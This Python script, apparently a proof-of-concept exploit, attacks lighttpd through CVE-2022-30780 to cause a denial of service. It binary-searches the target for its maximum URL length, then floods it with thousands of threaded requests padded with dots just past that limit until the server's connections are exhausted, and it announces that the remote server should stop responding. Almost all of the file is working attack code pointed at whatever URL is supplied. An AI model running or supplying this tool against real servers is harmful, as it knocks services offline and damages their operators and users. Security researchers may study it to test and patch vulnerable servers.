#!/usr/bin/env python3 # -*- coding: utf-8 -*- # File name : CVE-2022-30780-lighttpd-denial-of-service.py # Author : Podalirius (@podalirius_) # Date created : 17 July 2021 import argparse import requests import time from concurrent.futures import ThreadPoolExecutor from enum import Enum class RequestStatus(Enum): OK = 0 HTTP_200 = 200 HTTP_403 = 403 HTTP_404 = 404 HTTP_500 = 500 ReadTimeout = 1001 ConnectTimeout = 1002 ConnectionError = 1003 def test(baseurl, lenght, timeout=1): try: length = lenght - (len(baseurl) + 2) testurl = baseurl + '/' + "."*length + "/" r = requests.get(testurl, timeout=timeout) except requests.exceptions.ReadTimeout as e: return RequestStatus.ReadTimeout except requests.exceptions.ConnectTimeout as e: return RequestStatus.ConnectTimeout except requests.exceptions.ConnectionError as e: return RequestStatus.ConnectionError return RequestStatus.OK def dichotomic_search(url, timeout=1, verbose=False): print("[>] Performing dichotomic search to find maximum URL length ...") urllen, step = 1000, 1000 normal_response = test(url, len(url), timeout=timeout) last_result = normal_response if last_result == normal_response: while step >= 1 and 0 < urllen <= 150000: result = test(url, urllen, timeout=timeout) if verbose: print(" [>] Testing URL length %d, (%s => %s)" % (urllen, result.name, last_result.name)) if last_result == RequestStatus.OK: if result == RequestStatus.OK: urllen = urllen + step else: # Too long step = step//2 urllen = urllen - step else: if result == normal_response: step = step//2 urllen = urllen + step else: # Too long urllen = urllen - step last_result = result if urllen <= 0 or urllen >= 150000: print("[!] Could not determine maximum URL length.") print("[!] Maybe we can't connect to this URL or this lighttpd is not vulnerable?") return None else: print("[+] Found maximum URL length %d" % urllen) return urllen else: print("[!] Could connect to this URL. (%s)" % last_result) return None def worker(baseurl, max_url_len, monitor_data): try: length = (max_url_len + 1) - (len(baseurl) + 2) testurl = baseurl + '/' + "."*length + "/" monitor_data["sent"] = monitor_data["sent"] + 1 r = requests.get(testurl, timeout=1) except requests.exceptions.ReadTimeout as e: monitor_data["ReadTimeout"] = monitor_data["ReadTimeout"] + 1 return "ReadTimeout" except requests.exceptions.ConnectTimeout as e: monitor_data["ConnectTimeout"] = monitor_data["ConnectTimeout"] + 1 return "ConnectTimeout" return None def monitor_thread(monitor_data): refresh_rate = 0.5 dos_count = 0 mon_last, mon_now = monitor_data.copy(), monitor_data.copy() while monitor_data["sent"] < monitor_data["total"] and dos_count <= 3: mon_now = monitor_data.copy() diff_ct = (mon_now["ConnectTimeout"] - mon_last["ConnectTimeout"]) diff_rt = (mon_now["ReadTimeout"] - mon_last["ReadTimeout"]) if (diff_ct > 0) and (diff_rt == 0): # sockets disabled, connection limit reached dos_count += 1 print("[monitoring] (%04d/%04d) %5.2f %% | Rate %3d req/s | ConnectTimeout:%04d | ReadTimeout:%04d (sockets disabled, connection limit reached) " % ( mon_now["sent"], mon_now["total"], (mon_now["sent"] / mon_now["total"]) * 100, (mon_now["sent"] - mon_last["sent"]) * refresh_rate, mon_now["ConnectTimeout"], mon_now["ReadTimeout"]) ) else: dos_count = 0 print("[monitoring] (%04d/%04d) %5.2f %% | Rate %3d req/s | ConnectTimeout:%04d | ReadTimeout:%04d " % ( mon_now["sent"], mon_now["total"], (mon_now["sent"] / mon_now["total"]) * 100, (mon_now["sent"] - mon_last["sent"]) * refresh_rate, mon_now["ConnectTimeout"], mon_now["ReadTimeout"]) ) mon_last = mon_now time.sleep(refresh_rate) print() # If DoS, terminate all threads. if dos_count > 3: for t in monitor_data["tasks"]: t.cancel() def parseArgs(): parser = argparse.ArgumentParser(description="CVE-2022-30780-lighttpd-denial-of-service") parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose mode") parser.add_argument("-u", "--url", dest="url", action="store", type=str, required=True, help="URL to connect to.") parser.add_argument("-k", "--insecure", dest="insecure_tls", action="store_true", default=False, help="Allow insecure server connections when using SSL (default: False)") parser.add_argument("-t", "--threads", dest="threads", action="store", type=int, default=256, required=False, help="Number of threads (default: 20)") return parser.parse_args() if __name__ == '__main__': options = parseArgs() # https://redmine.lighttpd.net/issues/3059 server_max_fds = 8192 server_max_connections = 8192 if not options.url.startswith("http://") and not options.url.startswith("https://"): options.url = "https://" + options.url options.url = options.url.rstrip('/') if options.insecure_tls: # Disable warings of insecure connection for invalid certificates requests.packages.urllib3.disable_warnings() # Allow use of deprecated and weak cipher methods requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' try: requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL' except AttributeError: pass # Detecting maximum URL length max_url_len = dichotomic_search(options.url, timeout=1, verbose=options.verbose) if max_url_len is not None: monitor_data = { "total": server_max_connections, "sent": 0, "ReadTimeout": 0, "ConnectTimeout": 0, "tasks": [] } # Waits for all the threads to be completed with ThreadPoolExecutor(max_workers=min(options.threads, server_max_connections)) as tp: tp.submit(monitor_thread, monitor_data) for k in range(server_max_connections): t = tp.submit(worker, options.url, max_url_len, monitor_data) monitor_data["tasks"].append(t) print("[>] All done! Remote server at %s should not be responding anymore." % options.url)